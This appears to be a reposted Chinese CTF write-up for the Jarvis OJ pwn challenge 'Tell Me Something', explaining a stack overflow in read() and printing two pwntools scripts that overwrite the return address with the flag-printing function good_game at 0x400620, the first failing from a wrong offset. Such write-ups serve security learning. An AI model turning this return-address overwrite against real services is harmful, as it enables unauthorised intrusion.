[Jarvis OJ - PWN]——Tell Me Something

• 題目地址：https://www.jarvisoj.com/challenges
• 題目：
  
  還是先checksec一下,64位開(kāi)啟了NX保護(hù)
  
  IDA:看看，發(fā)現(xiàn)了可以利用的棧溢出函數(shù)read，第一個(gè)參數(shù)為0。代表標(biāo)準(zhǔn)讀入，距離ebp的距離為0x88
  
  找到可以打印flag的函數(shù)good_game和地址。可以作為覆蓋的返回地址0x400620
  所以expolit為

from pwn import * p = remote("pwn.jarvisoj.com",9876) ret = 0x00400620 payload = 'a'*（0x88 + 0x8) + p64(ret) p.sendline(payload) p.recvline() p.interactive()

可是沒(méi)想到不可以竟然失敗了。仔細(xì)看了下發(fā)現(xiàn)v4沒(méi)有ebp。什么鬼，孩子還是第一次碰到！！！不過(guò)以后可以長(zhǎng)長(zhǎng)記性了。

所以expolit為

from pwn import * p = remote("pwn.jarvisoj.com",9876) ret = 0x00400620 payload = 'a'*0x88+ p64(ret) p.sendline(payload) p.recvline() p.interactive()

如果有幫助，可以支持一下孩子哦 😃

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——Tell Me Something的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。